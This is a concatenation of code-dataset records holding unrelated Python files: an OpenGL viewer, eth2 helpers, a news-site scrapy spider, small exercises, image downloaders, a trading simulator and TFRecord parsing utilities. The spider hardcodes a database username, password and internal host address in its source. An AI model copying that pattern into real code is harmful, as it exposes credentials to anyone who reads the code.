\"\"\"\n        if action == glfw.PRESS or action == glfw.REPEAT:\n            if key == glfw.KEY_ESCAPE or key == glfw.KEY_Q:\n                glfw.set_window_should_close(self.win, True)\n            if key == glfw.KEY_W:\n                GL.glPolygonMode(GL.GL_FRONT_AND_BACK, next(self.fill_modes))\n            if key == glfw.KEY_SPACE:\n                glfw.set_time(0)\n\n\n# -------------- main program and scene setup --------------------------------\ndef main():\n    \"\"\" create a window, add scene objects, then run rendering loop \"\"\"\n    viewer = Viewer()\n\n    if len(sys.argv) < 2:\n        print('Cylinder skinning demo.')\n        print('Note:\\n\\t%s [3dfile]*\\n\\n3dfile\\t\\t the filename of a model in'\n              ' format supported by pyassimp.' % sys.argv[0])\n        viewer.add(SkinnedCylinder())\n    else:\n        viewer.add(*[m for file in sys.argv[1:] for m in load_skinned(file)])\n\n    # start rendering loop\n    viewer.run()\n\n\nif __name__ == '__main__':\n    glfw.init() # initialize window system glfw\n    main() # main function keeps variables locally scoped\n    glfw.terminate() # destroy all glfw windows and GL contexts\n","sub_path":"development_stage/viewer7.py","file_name":"viewer7.py","file_ext":"py","file_size_in_byte":25680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
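The KeyFrames class in viewer7.py above is the heart of the animation code: clamp outside the key range, bisect to the right-hand neighbour, and interpolate with the stored function. The same rule reduced to plain floats (an editorial sketch, not part of the dataset):

from bisect import bisect_left

times, values = (1.0, 3.0), (10.0, 20.0)

def value_at(t):
    if t <= times[0]:
        return values[0]
    if t >= times[-1]:
        return values[-1]
    i = bisect_left(times, t)  # first index with times[i] >= t
    f = (t - times[i - 1]) / (times[i] - times[i - 1])
    return values[i - 1] + f * (values[i] - values[i - 1])  # plain lerp

assert value_at(0.5) == 10.0 and value_at(2.0) == 15.0 and value_at(4.0) == 20.0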
{"seq_id":"266370991","text":"from typing import (\n    Sequence,\n    Tuple,\n    TYPE_CHECKING,\n)\n\n\nfrom eth_utils import (\n    ValidationError,\n)\nfrom eth_typing import (\n    Hash32,\n)\n\nfrom eth2.beacon._utils.hash import (\n    hash_eth2,\n)\nfrom eth2.beacon.enums import (\n    SignatureDomain,\n)\nfrom eth2.beacon.typing import (\n    Epoch,\n    Gwei,\n    Slot,\n    ValidatorIndex,\n)\nfrom eth2.beacon.validation import (\n    validate_epoch_for_active_index_root,\n    validate_epoch_for_active_randao_mix,\n)\n\nif TYPE_CHECKING:\n    from eth2.beacon.types.attestation_data import AttestationData # noqa: F401\n    from eth2.beacon.types.states import BeaconState # noqa: F401\n    from eth2.beacon.types.forks import Fork # noqa: F401\n    from eth2.beacon.types.slashable_attestations import SlashableAttestation # noqa: F401\n    from eth2.beacon.types.validator_records import ValidatorRecord # noqa: F401\n\n\n#\n# Time unit conversion\n#\ndef slot_to_epoch(slot: Slot, slots_per_epoch: int) -> Epoch:\n    return Epoch(slot // slots_per_epoch)\n\n\ndef get_epoch_start_slot(epoch: Epoch, slots_per_epoch: int) -> Slot:\n    return Slot(epoch * slots_per_epoch)\n\n\ndef _get_block_root(\n        latest_block_roots: Sequence[Hash32],\n        state_slot: Slot,\n        slot: Slot,\n        latest_block_roots_length: int) -> Hash32:\n    \"\"\"\n    Return the block root at a recent ``slot``.\n    \"\"\"\n    if state_slot > slot + latest_block_roots_length:\n        raise ValidationError(\n            \"state.slot ({}) should be less than or equal to \"\n            \"(slot + latest_block_roots_length) ({}), \"\n            \"where slot={}, latest_block_roots_length={}\".format(\n                state_slot,\n                slot + latest_block_roots_length,\n                slot,\n                latest_block_roots_length,\n            )\n        )\n    if slot >= state_slot:\n        raise ValidationError(\n            \"slot ({}) should be less than state.slot ({})\".format(\n                slot,\n                state_slot,\n            )\n        )\n    return latest_block_roots[slot % latest_block_roots_length]\n\n\ndef get_block_root(\n        state: 'BeaconState',\n        slot: Slot,\n        latest_block_roots_length: int) -> Hash32:\n    \"\"\"\n    Return the block root at a recent ``slot``.\n    \"\"\"\n    return _get_block_root(\n        state.latest_block_roots,\n        state.slot,\n        slot,\n        latest_block_roots_length,\n    )\n\n\ndef get_randao_mix(state: 'BeaconState',\n                   epoch: Epoch,\n                   slots_per_epoch: int,\n                   latest_randao_mixes_length: int) -> Hash32:\n    \"\"\"\n    Return the randao mix at a recent ``epoch``.\n    \"\"\"\n    validate_epoch_for_active_randao_mix(\n        state.current_epoch(slots_per_epoch),\n        epoch,\n        latest_randao_mixes_length,\n    )\n\n    return state.latest_randao_mixes[epoch % latest_randao_mixes_length]\n\n\ndef get_active_validator_indices(validators: Sequence['ValidatorRecord'],\n                                 epoch: Epoch) -> Tuple[ValidatorIndex, ...]:\n    \"\"\"\n    Get indices of active validators from ``validators``.\n    \"\"\"\n    return tuple(\n        ValidatorIndex(index)\n        for index, validator in enumerate(validators)\n        if validator.is_active(epoch)\n    )\n\n\ndef generate_seed(state: 'BeaconState',\n                  epoch: Epoch,\n                  slots_per_epoch: int,\n                  min_seed_lookahead: int,\n                  activation_exit_delay: int,\n                  latest_active_index_roots_length: int,\n                  latest_randao_mixes_length: int) -> Hash32:\n    \"\"\"\n    Generate a seed for the given ``epoch``.\n    \"\"\"\n    randao_mix = get_randao_mix(\n        state=state,\n        epoch=Epoch(epoch - min_seed_lookahead),\n        slots_per_epoch=slots_per_epoch,\n        latest_randao_mixes_length=latest_randao_mixes_length,\n    )\n    active_index_root = get_active_index_root(\n        state=state,\n        epoch=epoch,\n        slots_per_epoch=slots_per_epoch,\n        activation_exit_delay=activation_exit_delay,\n        latest_active_index_roots_length=latest_active_index_roots_length,\n    )\n    epoch_as_bytes = epoch.to_bytes(32, byteorder=\"little\")\n\n    return hash_eth2(randao_mix + active_index_root + epoch_as_bytes)\n\n\ndef get_active_index_root(state: 'BeaconState',\n                          epoch: Epoch,\n                          slots_per_epoch: int,\n                          activation_exit_delay: int,\n                          latest_active_index_roots_length: int) -> Hash32:\n    \"\"\"\n    Return the index root at a recent ``epoch``.\n    \"\"\"\n    validate_epoch_for_active_index_root(\n        state.current_epoch(slots_per_epoch),\n        epoch,\n        activation_exit_delay,\n        latest_active_index_roots_length,\n    )\n\n    return state.latest_active_index_roots[epoch % latest_active_index_roots_length]\n\n\ndef get_effective_balance(\n        validator_balances: Sequence[Gwei],\n        index: ValidatorIndex,\n        max_deposit_amount: Gwei) -> Gwei:\n    \"\"\"\n    Return the effective balance (also known as \"balance at stake\") for a\n    ``validator`` with the given ``index``.\n    \"\"\"\n    return min(validator_balances[index], max_deposit_amount)\n\n\ndef get_total_balance(validator_balances: Sequence[Gwei],\n                      validator_indices: Sequence[ValidatorIndex],\n                      max_deposit_amount: Gwei) -> Gwei:\n    \"\"\"\n    Return the combined effective balance of an array of validators.\n    \"\"\"\n    return Gwei(sum(\n        get_effective_balance(validator_balances, index, max_deposit_amount)\n        for index in validator_indices\n    ))\n\n\ndef get_fork_version(fork: 'Fork',\n                     epoch: Epoch) -> bytes:\n    \"\"\"\n    Return the current ``fork_version`` from the given ``fork`` and ``epoch``.\n    \"\"\"\n    if epoch < fork.epoch:\n        return fork.previous_version\n    else:\n        return fork.current_version\n\n\ndef get_domain(fork: 'Fork',\n               epoch: Epoch,\n               domain_type: SignatureDomain) -> int:\n    \"\"\"\n    Return the domain number of the current fork and ``domain_type``.\n    \"\"\"\n    return int.from_bytes(\n        get_fork_version(\n            fork,\n            epoch,\n        ) + domain_type.to_bytes(4, 'little'),\n        'little'\n    )\n\n\ndef is_double_vote(attestation_data_1: 'AttestationData',\n                   attestation_data_2: 'AttestationData',\n                   slots_per_epoch: int) -> bool:\n    \"\"\"\n    Assumes ``attestation_data_1`` is distinct from ``attestation_data_2``.\n\n    Return True if the provided ``AttestationData`` are slashable\n    due to a 'double vote'.\n    \"\"\"\n    return (\n        slot_to_epoch(attestation_data_1.slot, slots_per_epoch) ==\n        slot_to_epoch(attestation_data_2.slot, slots_per_epoch)\n
    )\n\n\ndef is_surround_vote(attestation_data_1: 'AttestationData',\n                     attestation_data_2: 'AttestationData',\n                     slots_per_epoch: int) -> bool:\n    \"\"\"\n    Assumes ``attestation_data_1`` is distinct from ``attestation_data_2``.\n\n    Return True if the provided ``AttestationData`` are slashable\n    due to a 'surround vote'.\n\n    Note: parameter order matters as this function only checks\n    that ``attestation_data_1`` surrounds ``attestation_data_2``.\n    \"\"\"\n    source_epoch_1 = attestation_data_1.justified_epoch\n    source_epoch_2 = attestation_data_2.justified_epoch\n    target_epoch_1 = slot_to_epoch(attestation_data_1.slot, slots_per_epoch)\n    target_epoch_2 = slot_to_epoch(attestation_data_2.slot, slots_per_epoch)\n    return source_epoch_1 < source_epoch_2 and target_epoch_2 < target_epoch_1\n\n\ndef get_delayed_activation_exit_epoch(\n        epoch: Epoch,\n        activation_exit_delay: int) -> Epoch:\n    \"\"\"\n    An entry or exit triggered in the ``epoch`` given by the input takes effect at\n    the epoch given by the output.\n    \"\"\"\n    return Epoch(epoch + 1 + activation_exit_delay)\n","sub_path":"eth2/beacon/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
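The slashing predicates at the end of the helpers record above compare source and target epochs. A worked example (an editorial sketch; 64 slots per epoch is just an illustrative value): with attestation 1 spanning source epoch 0 to target epoch 3 and attestation 2 spanning source epoch 1 to target epoch 2, the first surrounds the second.

SLOTS_PER_EPOCH = 64

def to_epoch(slot):
    return slot // SLOTS_PER_EPOCH  # mirrors slot_to_epoch above

source_1, target_1 = 0, to_epoch(3 * SLOTS_PER_EPOCH)  # attestation 1
source_2, target_2 = 1, to_epoch(2 * SLOTS_PER_EPOCH)  # attestation 2
# is_surround_vote: strictly later source and strictly earlier target
assert source_1 < source_2 and target_2 < target_1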
{"seq_id":"54489310","text":"from crawler.spiders import BaseSpider\n\n# Do not modify the imports included in this file\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request, Response\nimport re\nimport time\n\n\n# Change the spider class name and the name field to the corresponding website name\nclass technobaboy(BaseSpider):\n    name = 'technobaboy'\n    website_id = 1246 # website id (required)\n    language_id = 1866 # id of the language used\n    start_urls = ['https://www.technobaboy.com/']\n    sql = { # sql config\n        'host': '192.168.235.162',\n        'user': 'dg_admin',\n        'password': 'dg_admin',\n        'db': 'dg_crawler'\n    }\n\n    # This is the class init function, used to pass in the timestamp parameter\n    \n    \n    \n\n    def parse(self,response):\n        meta={}\n        meta['category2']=''\n        soup=BeautifulSoup(response.text,'lxml')\n        cat1_list=soup.find('ul',class_='menu').select('li>a')\n        for cat1 in cat1_list:\n            url=cat1['href']\n            meta['category1']=cat1.text\n            yield scrapy.Request(url,meta=meta,callback=self.parse_category2)\n\n    def parse_category2(self,response):\n        soup=BeautifulSoup(response.text,'lxml')\n        url_list=soup.select('.col-12 .content h2 a') if soup.select('.col-12 .content h2 a') else None\n        if(url_list):\n            for url in url_list:\n                news_url=url.get('href')\n                yield scrapy.Request(news_url,meta=response.meta,callback=self.parse_details)\n        if soup.find('span',class_='page-numbers label-next'):\n            next_url=soup.find('span',class_='page-numbers label-next').find('a').get('href')\n            if self.time==None or Util.format_time3(Util.format_time2(soup.select('.posts-wrap time')[-1].text)) >= int(self.time):\n                yield scrapy.Request(next_url,meta=response.meta,callback=self.parse_category2)\n            else:\n                self.logger.info('time cutoff reached')\n\n    def parse_details(self,response):\n        item=NewsItem()\n        soup=BeautifulSoup(response.text,'lxml')\n        item['category1']=response.meta['category1']\n        item['category2']=response.meta['category2']\n        \n        item['title']=soup.find('h1',class_='post-title').text.strip() if soup.find('h1',class_='post-title') else None\n        \n        item['body'] = '' # do not forget to initialize\n        body_list=soup.find('div',class_='post-content description cf entry-content content-spacious').select('p') if soup.find('div',class_='post-content description cf entry-content content-spacious').select('p') else None\n        if(body_list):\n            for body in body_list:\n                item['body'] += body.text.strip()\n                item['body'] +='\\n'\n        \n\n        item['abstract']=soup.find('div',class_='post-content description cf entry-content content-spacious').select('p')[0].text.strip() if soup.find('div',class_='post-content description cf entry-content content-spacious').select('p') else None\n        \n\n        item['images']=[]\n        \n\n        image_list_0=soup.select('.featured>a')if soup.select('.featured>a') else None\n        if(image_list_0):\n            for image_0 in image_list_0:\n                image_0=image_0.get('href')\n                item['images'].append(image_0)\n        \n\n\n        image_list=soup.find('div',class_='post-content description cf entry-content content-spacious').select('img')if soup.find('div',class_='post-content description cf entry-content content-spacious').select('img') else None\n        if(image_list):\n            for image in image_list:\n                image=image.get('src')\n                item['images'].append(image)\n        \n        \n        pub=soup.find('time',class_='post-date').text.strip() if soup.find('time',class_='post-date') else None\n        if(pub):\n            pub=Util.format_time2(pub)\n        item['pub_time']=pub\n        print(item['pub_time'])\n\n        yield item","sub_path":"crawler/v1/technobaboy.py","file_name":"technobaboy.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"465706407","text":"\nA_team = 11\nB_team = 11\ncards = input().split(' ')\nremoved_cards = []\nfor card in cards:\n    if card in removed_cards:\n        continue\n    removed_cards.append(card)\n    team, card = card.split('-')\n    card = int(card)\n    if team == 'A' and 1 <= card <= 11:\n        A_team -= 1\n    elif team == 'B' and 1 <= card <= 11:\n        B_team -= 1\n    if A_team < 7 or B_team < 7:\n        print(f'Team A - {A_team}; Team B - {B_team}')\n        print('Game was terminated')\n        break\nif A_team >= 7 and B_team >= 7:\n    print(f'Team A - {A_team}; Team B - 
{B_team}')\n\n","sub_path":"Lists2/03. Football Cards.py","file_name":"03. Football Cards.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"628137438","text":"def to_weird_case(string):\n words = string.split(' ')\n new_words = []\n for i in range(len(words)):\n new_word = ''\n for j in range(len(words[i])):\n if j % 2 != 0:\n new_word += words[i][j].lower()\n else:\n new_word += words[i][j].upper()\n\n new_words.append(new_word)\n\n return ' '.join(new_words)\n\nprint(to_weird_case('stst test sssa tsst Test valami vala test'))\n","sub_path":"practice/codewars/weird_string_case.py","file_name":"weird_string_case.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"122240387","text":"from PyQt6.QtCore import *\nfrom PyQt6.QtGui import *\nfrom PyQt6.QtWidgets import *\n\nfrom ..core.widget import set_contents_margins\n\n\nclass QXVBoxLayout(QVBoxLayout):\n def __init__(self, widgets=None, contents_margins=0, spacing=0):\n super().__init__()\n set_contents_margins(self, contents_margins)\n if widgets is not None:\n for widget in widgets:\n alignment = None\n if isinstance(widget, int):\n thickness=widget\n widget = QWidget()\n widget.setFixedHeight(thickness)\n widget.setSizePolicy(QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Fixed)\n\n if isinstance(widget, (tuple,list)):\n widget, alignment = widget\n\n if isinstance(widget, QLayout):\n self.addLayout(widget)\n else:\n self.addWidget(widget)\n if alignment is not None:\n self.setAlignment(widget, alignment)\n if spacing is not None:\n self.setSpacing(spacing)\n","sub_path":"xlib/qt/widgets/QXVBoxLayout.py","file_name":"QXVBoxLayout.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"392460169","text":"\"\"\" Creates a dataset by reading image links obtained from google images through 'Image Link Grabber' plugin and\n downloads each image for those links. Images are stored in data directory under their respective class folder.\n\"\"\"\nfrom fastai.vision.utils import download_images\nfrom fastai.vision import *\nfrom fastai.imports import *\nimport os\nimport zipfile\nimport time\n\n\n# downloads images to specific directories in data folder for each class\ndef download_images_to_folder(file, folder):\n path = Path('../data/dataset_csvs/')\n dest = path / folder\n dest.mkdir(parents=True, exist_ok=True)\n download_images(path / file, dest)\n\n\n# used if running on google colab, to zip the folder for downloading dataset\ndef zip_folder(data_class_name):\n zip_file = zipfile.ZipFile(data_class_name + '.zip', 'w', zipfile.ZIP_DEFLATED)\n filepath = 'data/dataset_csvs/' + data_class_name + '/'\n for root, dirs, files in os.walk(filepath):\n for file in files:\n zip_file.write(os.path.join(root, file),\n os.path.relpath(os.path.join(root, file), os.path.join(filepath, '../..')))\n zip_file.close()\n\n\n# opens all csv files in data folder and downloads the images to their respective class folders\ndef main():\n for all_files in os.listdir('../data/dataset_csvs/'):\n if all_files.endswith('.csv'):\n filename = all_files\n class_name = filename.split('.')[0]\n print('Downloading files for {0} class'.format(class_name))\n print(filename)\n download_images_to_folder(filename, class_name)\n print('... 
Downloaded files for {0} class'.format(class_name))\n time.sleep(5)\n # uncomment the line below if folder needs to be zipped\n # zip_folder(class_name)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/download_google_images.py","file_name":"download_google_images.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601198310","text":"import os\nimport json\nfrom google_images_download import google_images_download\n\nrequests = {\n 'computer-keyboard': ('keyboard', 'gaming keyboard', 'computer keyboard'),\n 'computer-mouse': ('computer mouse', 'gaming mouse', 'mouse laptop'),\n 'computer-monitor': ('monitor', 'computer monitor', 'computer monitor reviews'),\n}\n\nfor dir, keywords in requests.items():\n # Download images\n for kw in keywords:\n response = google_images_download.googleimagesdownload()\n args = {\n 'keywords': kw,\n 'format': 'jpg',\n 'output_directory': '.',\n 'image_directory': dir,\n #'limit': 1, # for debugging\n }\n response.download(args)\n\n # Rename files\n path = os.path.join('.', dir)\n for i, file in enumerate(os.listdir(path)):\n os.rename(os.path.join(path, file),\n os.path.join(path, str(i) + '.jpg'))\n\n# Save labels to json format\nwith open(os.path.join('..', 'label.json'), 'w') as f:\n d = {'labels': list(requests.keys())}\n f.write(json.dumps(d, indent=2, separators=(',', ': ')))\n","sub_path":"training/dataset/download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"139363313","text":"# External imports\r\nimport pandas as pd\r\n\r\n#===============================================================================\r\n# Class for simulating strategies \r\n#===============================================================================\r\n\r\nclass Simulator:\r\n\t'''\r\n\tClass for simulating simplest trading strategies and their outcome\r\n\t'''\r\n\tdef __init__(self, finance_data, depot, strategy, start_time=None):\r\n\t\t'''\r\n\t\tConstructor of the simulator class\r\n\t\t\r\n\t\tArgs:\r\n\t\t\tfinance_data (pd.DataFrame): data frame containing all the finance\r\n\t\t\t\tdata on which the simulation is run\r\n\t\t\tdepot (Depot object): contains the starting parameters for the\r\n\t\t\t\tsimulation.\r\n\t\t\tstrategy (function): the strategy used for buying and selling\r\n\t\t'''\r\n\t\t# Copy references to parameters to class variables\r\n\t\tself.finance = finance_data\r\n\t\tself.depot = depot\r\n\t\tself.strategy = strategy\r\n\t\tself.start_time = start_time\r\n\t\t# Create sorted list of unique dates from given finance data\r\n\t\tself.dates = list(set(self.finance.data.reset_index()['Date']))\r\n\t\tself.dates.sort()\r\n\t\t# Reduce dates to those after start_time\r\n\t\tif self.start_time:\r\n\t\t\t#List comprehension to apply start date\r\n\t\t\tself.dates = [x for x in self.dates if x >= self.start_time]\r\n\t\telse:\r\n\t\t\tself.start_time = min(self.dates)\r\n\t\t# Create the simulation result object\r\n\t\tself.result = pd.DataFrame(index=self.dates)\r\n\t\tself.result['capital'] = pd.np.nan \r\n\t\r\n\t\t\r\n\tdef run(self, **kwargs):\r\n\t\t'''\r\n\t\tFunction to run the simulation of a strategy\r\n\t\t'''\r\n\t\t# Initialize back-testing variables\r\n\t\tfor time in self.dates:\r\n\t\t\t# only pass data that should be known\r\n\t\t\ttime_data = self.finance.data.select(lambda x: x[1] <= 
time)\r\n\t\t\tself.strategy(data=time_data, depot=self.depot, time=time, **kwargs)\r\n\t\t\t# Save the time development of the capital\r\n\t\t\tself.result.loc[time]['capital'] = self.depot.capital\r\n\t\t# At end of simulation monetize all your assets at closing price\r\n\t\ttime = max(self.dates)\r\n\t\tself.depot.monetize(self.finance.data.xs(time,level=1)['Close'])\r\n\t\t# Sace the capital in results object\r\n\t\tself.result.loc[time]['capital'] = self.depot.capital\r\n\t\t# For convenience return the result object\r\n\t\treturn self.result\r\n","sub_path":"src/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191535282","text":"# coding: utf-8\n\n# This file is part of the Adblock Plus web scripts,\n# Copyright (C) 2006-2016 Eyeo GmbH\n#\n# Adblock Plus is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 3 as\n# published by the Free Software Foundation.\n#\n# Adblock Plus is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Adblock Plus. If not, see .\n\nimport itertools\n\nfrom sitescripts.filterhits import db\n\ndef update(interval, data):\n \"\"\"\n Generator that provides all the SQL and parameters needed to update the\n aggregations for the given data + interval in the database.\n \"\"\"\n for filter, filter_data in data[\"filters\"].iteritems():\n yield (\"\"\"INSERT IGNORE INTO `filters`\n (filter, sha1) VALUES (%s, UNHEX(SHA1(filter)))\"\"\", filter)\n\n domains = itertools.chain(filter_data.get(\"thirdParty\", {}).iteritems(),\n filter_data.get(\"firstParty\", {}).iteritems())\n for domain, domain_data in domains:\n yield (\"\"\"INSERT INTO `frequencies`\n (filter_sha1, domain, frequency, timestamp)\n VALUES (UNHEX(SHA1(%s)), %s, %s, FROM_UNIXTIME(%s))\n ON DUPLICATE KEY UPDATE\n frequency = (\n POW(frequency, 1 - (UNIX_TIMESTAMP(VALUES(timestamp)) -\n UNIX_TIMESTAMP(timestamp)) / %s) *\n POW(VALUES(frequency), (UNIX_TIMESTAMP(VALUES(timestamp)) -\n UNIX_TIMESTAMP(timestamp)) / %s)),\n timestamp = VALUES(timestamp)\"\"\",\n filter, domain, domain_data[\"hits\"],\n int(domain_data[\"latest\"] / 1000), interval, interval)\n","sub_path":"sitescripts/filterhits/geometrical_mean.py","file_name":"geometrical_mean.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"173839252","text":"import tensorflow as tf\nfrom tensorflow import io\nfrom tensorflow import data\nfrom tensorflow import sparse\nfrom tensorflow import image\nfrom logging import Logger\n\nfrom ml4ir.base.io.file_io import FileIO\nfrom ml4ir.base.features.preprocessing import PreprocessingMap\nfrom ml4ir.base.features.feature_config import FeatureConfig\nfrom ml4ir.base.config.keys import SequenceExampleTypeKey, TFRecordTypeKey\n\n\"\"\"\nThis module contains helper methods for reading and writing\ndata in the train.SequenceExample protobuf format\n\"\"\"\n\n\ndef preprocess_feature(feature_tensor, feature_info, preprocessing_map):\n # Preprocess features\n preprocessing_info = feature_info.get(\"preprocessing_info\", [])\n\n if preprocessing_info:\n for 
preprocessing_step in preprocessing_info:\n preprocessing_fn = preprocessing_map.get_fn(preprocessing_step[\"fn\"])\n if preprocessing_fn:\n feature_tensor = preprocessing_fn(\n feature_tensor, **preprocessing_step.get(\"args\", {})\n )\n return feature_tensor\n\n\ndef make_example_parse_fn(\n feature_config: FeatureConfig,\n preprocessing_map: PreprocessingMap,\n required_fields_only: bool = False,\n) -> tf.function:\n \"\"\"\n Create a parse function using the Example features spec\n\n Args:\n feature_config: FeatureConfig object defining context and sequence features\n max_sequence_size: Maximum number of sequence per query. Used for padding.\n required_fields_only: Whether to only use required fields from the feature_config\n pad_sequence: Whether to pad sequence\n \"\"\"\n\n features_spec = dict()\n\n for feature_info in feature_config.get_all_features():\n serving_info = feature_info[\"serving_info\"]\n if not required_fields_only or serving_info.get(\"required\", feature_info[\"trainable\"]):\n feature_name = feature_info[\"name\"]\n dtype = feature_info[\"dtype\"]\n default_value = feature_config.get_default_value(feature_info)\n features_spec[feature_name] = io.FixedLenFeature(\n [], dtype, default_value=default_value\n )\n print(features_spec)\n\n @tf.function\n def _parse_example_fn(example_proto):\n \"\"\"\n Parse the input `tf.Example` proto using the features_spec\n\n Args:\n example_proto: tfrecord Example protobuf data\n\n Returns:\n features: parsed features extracted from the protobuf\n labels: parsed label extracted from the protobuf\n \"\"\"\n features = io.parse_single_example(serialized=example_proto, features=features_spec)\n\n features_dict = dict()\n\n # Process all features, including label.\n for feature_info in feature_config.get_all_features():\n feature_node_name = feature_info.get(\"node_name\", feature_info[\"name\"])\n\n default_tensor = tf.constant(\n value=feature_config.get_default_value(feature_info), dtype=feature_info[\"dtype\"],\n )\n feature_tensor = features.get(feature_info[\"name\"], default_tensor)\n\n feature_tensor = tf.expand_dims(feature_tensor, axis=0)\n\n feature_tensor = preprocess_feature(feature_tensor, feature_info, preprocessing_map)\n\n features_dict[feature_node_name] = feature_tensor\n\n labels = features_dict.pop(feature_config.get_label(key=\"name\"))\n\n return features_dict, labels\n\n return _parse_example_fn\n\n\ndef make_sequence_example_parse_fn(\n feature_config: FeatureConfig,\n preprocessing_map: PreprocessingMap,\n max_sequence_size: int = 25,\n required_fields_only: bool = False,\n pad_sequence: bool = True,\n) -> tf.function:\n \"\"\"\n Create a parse function using the context and sequence features spec\n\n Args:\n feature_config: FeatureConfig object defining context and sequence features\n max_sequence_size: Maximum number of sequence per query. 
Used for padding.\n required_fields_only: Whether to only use required fields from the feature_config\n pad_sequence: Whether to pad sequence\n \"\"\"\n\n context_features_spec = dict()\n sequence_features_spec = dict()\n\n for feature_info in feature_config.get_all_features():\n serving_info = feature_info[\"serving_info\"]\n if not required_fields_only or serving_info.get(\"required\", feature_info[\"trainable\"]):\n feature_name = feature_info[\"name\"]\n dtype = feature_info[\"dtype\"]\n default_value = feature_config.get_default_value(feature_info)\n if feature_info[\"tfrecord_type\"] == SequenceExampleTypeKey.CONTEXT:\n context_features_spec[feature_name] = io.FixedLenFeature(\n [], dtype, default_value=default_value\n )\n elif feature_info[\"tfrecord_type\"] == SequenceExampleTypeKey.SEQUENCE:\n sequence_features_spec[feature_name] = io.VarLenFeature(dtype=dtype)\n\n @tf.function\n def _parse_sequence_example_fn(sequence_example_proto):\n \"\"\"\n Parse the input `tf.SequenceExample` proto using the features_spec\n\n Args:\n sequence_example_proto: tfrecord SequenceExample protobuf data\n\n Returns:\n features: parsed features extracted from the protobuf\n labels: parsed label extracted from the protobuf\n \"\"\"\n context_features, sequence_features = io.parse_single_sequence_example(\n serialized=sequence_example_proto,\n context_features=context_features_spec,\n sequence_features=sequence_features_spec,\n )\n\n features_dict = dict()\n\n # Handle context features\n for feature_info in feature_config.get_context_features():\n feature_node_name = feature_info.get(\"node_name\", feature_info[\"name\"])\n\n default_tensor = tf.constant(\n value=feature_config.get_default_value(feature_info), dtype=feature_info[\"dtype\"],\n )\n feature_tensor = context_features.get(feature_info[\"name\"], default_tensor)\n\n feature_tensor = tf.expand_dims(feature_tensor, axis=0)\n\n # Preprocess features\n feature_tensor = preprocess_feature(feature_tensor, feature_info, preprocessing_map)\n\n features_dict[feature_node_name] = feature_tensor\n\n # Define mask to identify padded sequence\n if required_fields_only and not feature_config.get_rank(\"serving_info\")[\"required\"]:\n \"\"\"\n Define dummy mask if the rank field is not a required field for serving\n\n NOTE:\n This masks all max_sequence_size as 1 as there is no real way to know\n the number of sequence in the query. There is no predefined required field,\n and hence we would need to do a full pass of all features to find the record shape.\n This approach might be unstable if different features have different shapes.\n\n Hence we just mask all sequence\n \"\"\"\n features_dict[\"mask\"] = tf.constant(\n value=1, shape=[max_sequence_size], dtype=feature_config.get_rank(\"dtype\")\n )\n sequence_size = tf.constant(max_sequence_size, dtype=tf.int64)\n else:\n # Typically used at training time, to pad/clip to a fixed number of sequence per query\n\n # Use rank as a reference tensor to infer shape/sequence_size in query\n reference_tensor = sequence_features.get(feature_config.get_rank(key=\"node_name\"))\n\n # Add mask for identifying padded sequence\n mask = tf.ones_like(sparse.to_dense(sparse.reset_shape(reference_tensor)))\n sequence_size = tf.cast(tf.reduce_sum(mask), tf.int64)\n\n if pad_sequence:\n mask = tf.expand_dims(mask, axis=-1)\n\n def crop_fn():\n tf.print(\"\\n[WARN] Bad query found. 
Number of sequence : \", tf.shape(mask)[1])\n return image.crop_to_bounding_box(\n mask,\n offset_height=0,\n offset_width=0,\n target_height=1,\n target_width=max_sequence_size,\n )\n\n mask = tf.cond(\n tf.shape(mask)[1] <= max_sequence_size,\n # Pad if there are missing sequence\n lambda: image.pad_to_bounding_box(\n mask,\n offset_height=0,\n offset_width=0,\n target_height=1,\n target_width=max_sequence_size,\n ),\n # Crop if there are extra sequence\n crop_fn,\n )\n mask = tf.squeeze(mask)\n else:\n mask = tf.squeeze(mask, axis=0)\n\n # Check validity of mask\n tf.debugging.assert_greater(sequence_size, tf.constant(0, dtype=tf.int64))\n\n features_dict[\"mask\"] = mask\n sequence_size = max_sequence_size if pad_sequence else sequence_size\n\n # Pad sequence features to max_sequence_size\n for feature_info in feature_config.get_sequence_features():\n feature_node_name = feature_info.get(\"node_name\", feature_info[\"name\"])\n\n default_tensor = tf.fill(\n value=tf.constant(\n value=feature_config.get_default_value(feature_info),\n dtype=feature_info[\"dtype\"],\n ),\n dims=[max_sequence_size if pad_sequence else sequence_size],\n )\n feature_tensor = sequence_features.get(feature_info[\"name\"], default_tensor)\n\n if isinstance(feature_tensor, sparse.SparseTensor):\n feature_tensor = sparse.reset_shape(\n feature_tensor,\n new_shape=[1, max_sequence_size if pad_sequence else sequence_size],\n )\n feature_tensor = 